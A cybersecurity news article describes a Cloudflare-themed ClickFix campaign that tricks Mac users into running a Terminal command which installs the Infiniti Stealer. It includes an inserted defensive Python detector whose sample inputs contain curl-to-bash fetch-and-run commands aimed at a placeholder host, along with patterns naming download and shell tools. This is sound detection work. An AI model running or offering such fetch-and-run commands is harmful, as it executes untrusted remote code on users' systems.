Cloudflare-Themed ClickFix Attack Targets Mac Users with Infiniti Stealer Malware

Cybersecurity researchers have uncovered a new malware campaign targeting macOS users through a deceptive Cloudflare-themed verification page, delivering a powerful information-stealing tool known as Infiniti Stealer. The attack, disclosed in March 2026, highlights the growing sophistication of social engineering techniques used to compromise Apple devices.

The campaign leverages a tactic known as “ClickFix,” where users are tricked into executing malicious commands themselves rather than being infected through traditional exploits. Victims are presented with a fake CAPTCHA page designed to mimic Cloudflare’s human verification system and are instructed to paste and run a command in the macOS Terminal, unknowingly initiating the attack.

Once the command is executed, a multi-stage infection chain is triggered. A Bash script is first downloaded from a remote server; that script then deploys a second-stage binary compiled using Nuitka, a tool that converts Python code into native applications. This approach makes the malware harder to detect and analyze using conventional security tools.
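A defender-side heuristic for the first stage described above, as an added example that is not from the article or the researchers: it flags command lines (for instance from shell history or process telemetry) in which a downloader feeds a shell interpreter, which is more general than this one campaign. The article does not give the pasted command, so the patterns, function names and sample command lines are assumptions, and the samples are constructed.

```python
import re
import shlex

FETCHERS = {"curl", "wget"}
EXECUTORS = {"sh", "bash", "zsh", "eval"}
SEPARATORS = {";", "&&", "||", "&"}
SUBST = re.compile(r"(?:\$\(|`)\s*(?:\S*/)?(?:curl|wget)\b")

def parse(cmdline):
    """Split into pipeline stages, each a list of simple commands (token lists)."""
    lex = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lex.whitespace_split = True  # keep URLs and paths as single tokens
    stages = [[[]]]
    for tok in lex:  # raises ValueError on unbalanced quotes
        if tok == "|":
            stages.append([[]])
        elif tok in SEPARATORS:
            stages[-1].append([])
        else:
            stages[-1][-1].append(tok)
    return stages

def name(tokens):
    """Program name of a simple command, ignoring sudo and any path."""
    rest = [t.rsplit("/", 1)[-1] for t in tokens if t != "sudo"]
    return rest[0] if rest else ""

def classify(cmdline):
    """Return a finding label, or None when nothing matches."""
    try:
        stages = parse(cmdline)
    except ValueError:
        return "unparseable"
    heads = [name(s[0]) for s in stages]   # command that reads each pipe
    tails = [name(s[-1]) for s in stages]  # command that writes each pipe
    for i, tail in enumerate(tails):
        if tail in FETCHERS and any(h in EXECUTORS for h in heads[i + 1:]):
            return "fetch-piped-to-shell"
    every = {name(cmd) for s in stages for cmd in s}
    if SUBST.search(cmdline) and every & EXECUTORS:  # bash -c "$(curl ...)"
        return "fetch-in-command-substitution"
    return None

# Constructed sample command lines (placeholder host, not campaign indicators).
SAMPLES = [
    "curl -fsSL https://example.invalid/verify.sh | bash",
    '/bin/bash -c "$(curl -fsSL https://example.invalid/verify.sh)"',
    'echo "docs mention curl | bash"',
]
```

Because the tokenizer respects quoting, the third sample is not flagged, which a plain substring match on `curl | bash` would get wrong.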

The final payload, Infiniti Stealer, is a Python-based information-stealing malware designed to extract sensitive data from infected systems. It targets browser credentials, macOS Keychain data, cryptocurrency wallets, developer environment files, and even captures screenshots during execution. The stolen data is then transmitted to a command-and-control server, and attackers receive notifications via Telegram once the data exfiltration is complete.

Researchers note that the attack relies entirely on social engineering rather than exploiting software vulnerabilities, making it particularly dangerous. By convincing users to execute commands manually, the malware can bypass many traditional security defenses that are designed to block automated threats.

The emergence of this campaign reflects a broader trend where techniques previously used against Windows systems are now being adapted for macOS environments. As attackers continue to refine their methods, experts warn that Mac users are increasingly becoming targets of sophisticated malware campaigns, emphasizing the need for heightened awareness and caution when interacting with unfamiliar prompts or verification pages.
